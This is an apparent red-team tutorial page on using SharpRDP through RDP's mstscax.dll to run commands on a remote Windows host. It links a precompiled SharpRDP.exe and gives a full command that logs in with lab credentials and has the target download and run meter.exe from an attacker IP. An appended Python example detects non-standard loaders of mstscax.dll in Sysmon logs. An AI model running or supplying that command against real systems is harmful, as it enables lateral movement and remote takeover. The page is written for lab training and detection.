# RDP as a Console

Although RDP is most often associated with the mstsc GUI client, it can also be used as a command-line tool. This technique reduces our overhead while still relying on the RDP protocol, which will often blend in well with typical network traffic.

The RDP application (mstsc.exe) builds upon the terminal services library mstscax.dll. This library exposes interfaces to both scripts and compiled code through COM objects.

SharpRDP is a C# application that uses the non-scriptable interfaces exposed by mstscax.dll to perform authentication in the same way as mstsc.exe.

Once authentication is performed, SharpRDP allows us to execute code through SendKeys. In this manner, no GUI access is required and setting up a reverse tunnel is unnecessary.

To demonstrate this, we’ll use the pre-compiled version of SharpRDP. We’ll specify the `computername`, `username`, and `password` parameters along with the `command` to be executed. In this example, we’ll simply execute a reverse TCP shell using PowerShell:

{% embed url="<https://github.com/sartlabs/OffensiveTools/blob/main/SharpRDP.exe>" %}
*SharpRDP.exe*
{% endembed %}

{% code overflow="wrap" %}

```powershell
sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.69/meter.exe','C:\Windows\Tasks\meter.exe'); C:\Windows\Tasks\meter.exe" username=corp1\dave password=lab
```

{% endcode %}

<figure><img src="/files/tjKc5eBoxqAi659VVoko" alt=""><figcaption><p><em>RDP taken using SharpRDP</em></p></figcaption></figure>
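
For defenders, the dependency on mstscax.dll described above is observable: a process other than the stock mstsc.exe loads the RDP library. The following is an added example, not part of the original page or of SharpRDP. It assumes Sysmon Event ID 7 (ImageLoad) telemetry, and the hostnames, users, most paths and the `unexpected_rdp_loaders` helper are constructed for illustration.

```python
import ntpath

# Assumption: the stock Windows RDP client runs only from these paths.
EXPECTED_LOADERS = {r"c:\windows\system32\mstsc.exe", r"c:\windows\syswow64\mstsc.exe"}
RDP_LIBRARY = "mstscax.dll"

# Constructed sample records using Sysmon Event ID 7 (ImageLoad) field names.
SAMPLE_EVENTS = [
    {"EventID": 7, "Computer": "client01", "User": r"corp1\alice",
     "Image": r"C:\Windows\System32\mstsc.exe", "ImageLoaded": r"C:\Windows\System32\mstscax.dll"},
    {"EventID": 7, "Computer": "client02", "User": r"corp1\dave",
     "Image": r"C:\Users\dave\Desktop\SharpRDP.exe", "ImageLoaded": r"C:\Windows\System32\mstscax.dll"},
    {"EventID": 7, "Computer": "client03", "User": r"corp1\dave",
     "Image": r"C:\Windows\Tasks\mstsc.exe", "ImageLoaded": r"C:\WINDOWS\SYSTEM32\MSTSCAX.DLL"},
    {"EventID": 7, "Computer": "client01", "User": r"corp1\alice",
     "Image": r"C:\Windows\System32\notepad.exe", "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 1, "Computer": "client02", "User": r"corp1\dave",
     "Image": r"C:\Users\dave\Desktop\SharpRDP.exe"},  # process creation, not an image load
]

def normalize(path):
    """Lower-case and normalise a Windows path so comparisons ignore case and quoting."""
    return ntpath.normpath(path.strip().strip('"')).lower()

def unexpected_rdp_loaders(events, expected=EXPECTED_LOADERS):
    """Return image-load events where mstscax.dll was loaded by an unexpected process."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7:
            continue
        if ntpath.basename(normalize(ev.get("ImageLoaded", ""))) != RDP_LIBRARY:
            continue
        image = normalize(ev.get("Image", ""))
        if image in expected:
            continue
        # A binary named mstsc.exe outside the system directories is treated separately:
        # matching on file name alone would let a renamed tool through.
        if ntpath.basename(image) == "mstsc.exe":
            reason = "mstsc.exe outside system directory"
        else:
            reason = "non-mstsc process loaded RDP library"
        findings.append({"host": ev.get("Computer"), "user": ev.get("User"),
                         "image": ev.get("Image"), "reason": reason})
    return findings

if __name__ == "__main__":
    for finding in unexpected_rdp_loaders(SAMPLE_EVENTS):
        print(finding)
```

Sysmon does not log ImageLoad events by default, so the configuration must include a rule for mstscax.dll. Other legitimate software that embeds the RDP control will also match and needs to be added to the expected set after review.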

